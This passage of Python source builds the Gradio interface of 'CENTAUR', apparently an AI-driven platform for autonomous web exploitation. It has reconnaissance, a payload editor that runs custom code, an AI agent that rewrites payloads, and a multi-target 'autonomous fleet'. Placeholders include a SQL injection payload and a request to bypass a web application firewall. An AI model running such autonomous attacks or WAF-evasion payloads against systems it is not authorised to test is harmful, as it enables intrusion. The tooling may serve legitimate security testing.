| "Method": http_method, |
| "Endpoint": ep, |
| "Payload": actual_payload, |
| "Code": code, |
| "Status": status_icon, |
| "Notes": evidence_str, |
| }) |
| return result_md, state, pd.DataFrame(state["arsenal"][tid]), exploit_logger.format_logs() |
|
|
|
|
| def load_payload_template(template_name): |
| return PAYLOAD_CODE_TEMPLATES.get(template_name, PAYLOAD_CODE_TEMPLATES["Custom"]) |
|
|
|
|
| async def patch_code_with_ai(current_code, user_request, tid, state, api_key): |
| if not tid or tid not in state["profiles"]: |
| return current_code, "❌ Select a target first" |
| p = state["profiles"][tid] |
| context = { |
| "target": tid, |
| "server": p.server_banner, |
| "waf": p.waf_detected, |
| "last_result": state["arsenal"].get(tid, [{}])[-1].get("Status", "N/A") |
| if state["arsenal"].get(tid) else "N/A", |
| } |
| patch = await ai_patch_payload_code(current_code, user_request, context, api_key) |
| if patch: |
| changes = "\n".join(f"- {c}" for c in patch.changes_made) |
| return patch.updated_code, f"**Changes:**\n{changes}\n\n**Explanation:**\n{patch.explanation}" |
| return current_code, "❌ Failed to patch code" |
|
|
|
|
| |
| |
| |
|
|
| _CSS = """ |
| .primary-btn { background: linear-gradient(45deg,#ff0080,#ff8c00) !important; } |
| .exploit-table { font-family: 'Courier New', monospace; font-size: 0.9em; } |
| .code-editor { font-family: 'Courier New', monospace; font-size: 0.95em; } |
| """ |
|
|
| with gr.Blocks(css=_CSS, theme=gr.themes.Monochrome()) as demo: |
|
|
| engine_state = gr.State({"profiles": {}, "arsenal": defaultdict(list)}) |
|
|
| gr.Markdown("# ⚔️ CENTAUR — Autonomous Penetration Testing Platform") |
| gr.Markdown("### AI-Powered Web Application Security Assessment Framework (Gemini 2.5 + Fix Loop)") |
|
|
| with gr.Row(): |
| api_key = gr.Textbox( |
| label="🔑 Gemini API Key", type="password", |
| placeholder="AIzaSy...", scale=3 |
| ) |
| gr.Markdown( |
| "Get your key from [Google AI Studio](https://aistudio.google.com/app/apikey)" |
| ) |
|
|
| with gr.Tabs(): |
|
|
| |
| with gr.Tab("🔍 1. Reconnaissance"): |
| with gr.Row(): |
| with gr.Column(scale=1): |
| gr.Markdown("### Target Input") |
| csv_in = gr.File(label="📁 CSV Upload (host,port)", file_count="multiple") |
| txt_in = gr.Textbox( |
| label="✍️ Manual Entry (one per line)", |
| placeholder="192.168.1.1:80\nexample.com:443\n10.0.0.1", |
| lines=5 |
| ) |
| recon_btn = gr.Button("🚀 START RECONNAISSANCE", variant="primary", size="lg") |
| recon_status = gr.Markdown("⚪ System Ready") |
|
|
| with gr.Column(scale=2): |
| gr.Markdown("### 🗄️ Target Database") |
| with gr.Row(): |
| f_ip = gr.Textbox(label="🔎 IP/Host Filter", placeholder="192.168", scale=2) |
| f_port = gr.Textbox(label="Port Filter", placeholder="80", scale=1) |
| f_v = gr.Checkbox(label="Exploitable Only", scale=1) |
| db_viewer = gr.Dataframe(interactive=False, wrap=True, elem_classes="exploit-table") |
|
|
| |
| with gr.Tab("⚔️ 2. War Room"): |
| with gr.Row(): |
| with gr.Column(scale=1): |
| gr.Markdown("### 🎯 Target Selection") |
| wr_target = gr.Dropdown(label="Active Target", choices=[], interactive=True) |
| wr_context = gr.Markdown("*Select a target to view intelligence...*") |
|
|
| gr.Markdown("### 📚 Arsenal History") |
| arsenal_table = gr.Dataframe( |
| headers=["Timestamp","Method","Endpoint","Payload","Status","Notes"], |
| interactive=False, wrap=True, elem_classes="exploit-table" |
| ) |
|
|
| with gr.Column(scale=1): |
| gr.Markdown("### 🛠️ Payload Editor") |
|
|
| with gr.Accordion("📖 Payload Library", open=False): |
| with gr.Row(): |
| lib_type = gr.Dropdown(label="Type", choices=["All"] + list(PAYLOAD_LIBRARY.keys()), value="All") |
| lib_search = gr.Textbox(label="Search", placeholder="SLEEP") |
| lib_table = gr.Dataframe(value=get_payload_library_df(), interactive=False, wrap=True) |
|
|
| with gr.Accordion("💻 Code Templates", open=False): |
| template_select = gr.Dropdown(label="Load Template", |
| choices=list(PAYLOAD_CODE_TEMPLATES.keys()), |
| value="Custom") |
| load_template_btn = gr.Button("Load Template") |
|
|
| http_method_sel = gr.Radio( |
| label="HTTP Method", choices=["GET","POST","PUT","DELETE"], |
| value="GET" |
| ) |
| ep_in = gr.Textbox(label="🎯 Endpoint", placeholder="/api/users?id=", value="") |
| pl_in = gr.Textbox(label="💉 Payload", placeholder="' OR SLEEP(5)--", value="", lines=3) |
|
|
| gr.Markdown("### 📝 Payload Code (Editable & Executable)") |
| code_editor = gr.Code( |
| label="Python Code", language="python", |
| value=PAYLOAD_CODE_TEMPLATES["Custom"], |
| lines=15, elem_classes="code-editor" |
| ) |
| use_code_chk = gr.Checkbox( |
| label="🔄 Execute code template to derive payload before firing", |
| value=False |
| ) |
|
|
| with gr.Row(): |
| fire_btn = gr.Button("🔥 EXECUTE PAYLOAD", variant="primary", size="lg") |
| clear_btn = gr.Button("🧹 Clear", size="lg") |
|
|
| fire_res = gr.Markdown() |
|
|
| with gr.Accordion("📊 Execution Logs", open=False): |
| log_viewer = gr.Textbox(label="Detailed Logs", lines=10, max_lines=20, interactive=False) |
|
|
| with gr.Column(scale=1): |
| gr.Markdown("### 🤖 AI Agent — CENTAUR") |
| chatbot = gr.Chatbot( |
| height=400, label="Conversational Interface", |
| show_label=False, |
| avatar_images=(None, "https://em-content.zobj.net/source/twitter/376/robot_1f916.png") |
| ) |
| chat_in = gr.Textbox( |
| label="Operator Instruction", |
| placeholder="The WAF blocked my SQLi. Help me bypass it with double URL encoding.", |
| lines=2 |
| ) |
| with gr.Row(): |
| chat_btn = gr.Button("📡 Send to Agent", variant="primary") |
| patch_code_btn = gr.Button("🔧 Patch Code with AI") |
| patch_result = gr.Markdown() |
|
|
| |
| with gr.Tab("🤖 3. Autonomous Fleet"): |
| gr.Markdown("""### 🚀 Multi-Target Autonomous Exploitation |
| Deploy AI agents to: analyse vulnerabilities (with CVE search) → generate strategies (with Metasploit templates) → craft payloads → execute with fix loop (auto-retry up to 3x) → analyse results.""") |
|
|
| fleet_select = gr.CheckboxGroup(label="🎯 Select Targets (max 10)", choices=[]) |
| fleet_deploy = gr.Button("⚡ DEPLOY AUTONOMOUS FLEET", variant="primary", size="lg") |
| fleet_md = gr.Markdown() |
| fleet_html = gr.HTML() |
|
|
| with gr.Accordion("📜 Detailed Attack Logs", open=False): |
| fleet_logs = gr.JSON(label="Execution Logs") |
|
|
| |
|
|
| recon_btn.click( |
| run_recon_bg, |
| inputs=[csv_in, txt_in, engine_state], |
| outputs=[engine_state, wr_target, fleet_select, recon_status, db_viewer] |
| ) |
|
|
| for comp in [f_ip, f_port, f_v]: |
| comp.change(get_db_dataframe, |
| inputs=[engine_state, f_ip, f_port, f_v], |
| outputs=db_viewer) |
|
|
| wr_target.change( |
| on_target_select, |
| inputs=[wr_target, engine_state], |
| outputs=[wr_context, arsenal_table, code_editor] |
| ) |
|
|
| lib_type.change(filter_payloads, inputs=[lib_type, lib_search], outputs=lib_table) |
| lib_search.change(filter_payloads, inputs=[lib_type, lib_search], outputs=lib_table) |
|
|
| load_template_btn.click(load_payload_template, inputs=[template_select], outputs=code_editor) |
|
|
| arsenal_table.select( |
| lambda tid, st, evt: ( |
| st["arsenal"][tid][evt.index[0]].get("Endpoint", ""), |
| st["arsenal"][tid][evt.index[0]].get("Payload", ""), |
| st["arsenal"][tid][evt.index[0]].get("Code", "# No code available"), |
| st["arsenal"][tid][evt.index[0]].get("Method", "GET"), |
| ) if (tid in st["arsenal"] and evt.index |
| and len(st["arsenal"][tid]) > evt.index[0]) else ("", "", "", "GET"), |
| inputs=[wr_target, engine_state], |
| outputs=[ep_in, pl_in, code_editor, http_method_sel] |
| ) |
|
|
| lib_table.select( |
| lambda evt, df: df.iloc[evt.index[0]]["Payload"] |
| if (evt.index and len(df) > evt.index[0]) else "", |
| inputs=[lib_table], |
| outputs=pl_in |
| ) |
|
|
| fire_btn.click( |
| execute_manual_wrap, |
| inputs=[wr_target, ep_in, pl_in, code_editor, http_method_sel, use_code_chk, engine_state], |
| outputs=[fire_res, engine_state, arsenal_table, log_viewer] |
| ) |
|
|
| clear_btn.click( |
| lambda: ("", "", PAYLOAD_CODE_TEMPLATES["Custom"], "GET"), |
| outputs=[ep_in, pl_in, code_editor, http_method_sel] |
| ) |
|
|
| chat_btn.click( |
| centaur_chat_agent, |
| inputs=[chat_in, chatbot, wr_target, engine_state, |
| ep_in, pl_in, code_editor, http_method_sel, api_key], |
| outputs=[chatbot, ep_in, pl_in, code_editor, http_method_sel, engine_state] |
| ).then( |
| lambda tid, st: pd.DataFrame(st["arsenal"].get(tid, [])), |
| inputs=[wr_target, engine_state], |
| outputs=arsenal_table |
| ).then(lambda: "", outputs=chat_in) |
|
|
| patch_code_btn.click( |
| patch_code_with_ai, |
| inputs=[code_editor, chat_in, wr_target, engine_state, api_key], |
| outputs=[code_editor, patch_result] |
| ).then(lambda: "", outputs=chat_in) |
|
|
| fleet_deploy.click( |
| run_autonomous_fleet, |
| inputs=[fleet_select, api_key, engine_state], |
| outputs=[fleet_md, fleet_html, fleet_logs] |
| ) |
|
|
|
|
| if __name__ == "__main__": |
| demo.launch(share=False, server_name="0.0.0.0", server_port=7860) |